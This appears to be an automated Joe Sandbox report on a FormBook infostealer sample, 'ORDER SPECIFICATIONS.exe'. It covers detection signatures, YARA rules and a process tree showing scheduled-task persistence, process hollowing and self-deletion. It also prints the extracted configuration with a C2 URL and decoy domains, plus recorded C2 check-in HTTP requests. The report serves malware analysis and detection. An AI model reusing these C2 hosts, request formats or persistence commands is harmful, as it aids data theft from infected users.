Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report ORDER SPECIFICATIONS.exe

Overview

General Information

Sample Name:ORDER SPECIFICATIONS.exe
Analysis ID:356492
MD5:e75a4df51162401b21c3eb79718fb3db
SHA1:3328ead22db03ce461cb8bdb5d59638120e2444f
SHA256:48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • ORDER SPECIFICATIONS.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • schtasks.exe (PID: 6476 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ORDER SPECIFICATIONS.exe (PID: 6520 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • ORDER SPECIFICATIONS.exe (PID: 6552 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5308 cmdline: /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x166a9:$sqlite3step: 68 34 1C 7B E1
          • 0x167bc:$sqlite3step: 68 34 1C 7B E1
          • 0x166d8:$sqlite3text: 68 38 2A 90 C5
          • 0x167fd:$sqlite3text: 68 38 2A 90 C5
          • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
          5.2.ORDER SPECIFICATIONS.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Scheduled temp file as task from temp locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' , ParentImage: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe, ParentProcessId: 6336, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', ProcessId: 6476

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\LvZiFDk.exeReversingLabs: Detection: 14%
            Multi AV Scanner detection for submitted fileShow sources
            Source: ORDER SPECIFICATIONS.exeVirustotal: Detection: 30%Perma Link
            Source: ORDER SPECIFICATIONS.exeReversingLabs: Detection: 14%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\LvZiFDk.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: ORDER SPECIFICATIONS.exeJoe Sandbox ML: detected
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: ORDER SPECIFICATIONS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: ORDER SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: chkdsk.pdbGCTL source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
            Source: Binary string: chkdsk.pdb source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: ORDER SPECIFICATIONS.exe, chkdsk.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 4x nop then jmp 0725D85Ch
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.athomecp.com/owws/
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1Host: www.abaplants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1Host: www.cyjulebu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1Host: www.denisekohli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1Host: www.hostsnc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1Host: www.assemble-4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1Host: www.raphaelyejesiel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1Host: www.your-new-body-plan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1Host: www.softwaresreports.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1Host: www.abaplants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1Host: www.cyjulebu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1Host: www.denisekohli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1Host: www.hostsnc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1Host: www.assemble-4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1Host: www.raphaelyejesiel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1Host: www.your-new-body-plan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1Host: www.softwaresreports.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: www.abaplants.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 07:57:48 GMTContent-Type: text/htmlContent-Length: 1039Connection: closeSet-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnlyCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 6e 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c 6f 73 65 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 74 72 29 7b 76 61 72 20 76 61 6c 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 74 72 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 7b 69 66 28 76 61 6c 20 3d 3d 20 22 22 29 76 61 6c 20 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 65 6c 73 65 20 76 61 6c 20 2b 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 7d 72 65 74 75 72 6e 20 76 61 6c 3b 7d 66 75 6e 63 74 69 6f 6e 20 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 7b 20 76 61 72 20 77 69 64 74 68 20 3d 73 63 72 65 65 6e 2e 77 69 64 74 68 3b 20 76 61 72 20 68 65 69 67 68 74 3d 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 20 76 61 72 20 73 63 72 65 65 6e 64 61 74 65 20 3d 20 77 69 64 74 68 20 2b 20 22 2c 22 20 2b 20 68 65 69 67 68 74 3b 76 61 72 20 63 75 72 6c 6f 63 61 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2d 31 20 3d 3d 20 63 75 72 6c 6f 63 61 74 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 22 29 29 7b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 73 72 63 75 72 6c 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 2b 20 22 3b 70 61 74 68 3d 2f 3b 22 3b 7d 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 22 2f 6f 77 77 73 2f 3f 46 5a 41 3d 4c 4e 74 63 5a 34 6f 33 52 53 62 69 4d 33 71 31 58 50 35 20 33 71 50 58 78 46 64 57 43 51 4c 38 46 56 7a 65 68 44 68 7a 54 65 31 68 35 39 73 6a 7a 61 76 6b 73 77 4c 48 4d 72 4f 53 4e 32 57 52 79 4c 76 50 26 47 7a 72 58 3d 42 7
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmpString found in binary or memory: http://en.wX
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: http://instagram.com/casarpontocom
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.nh
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
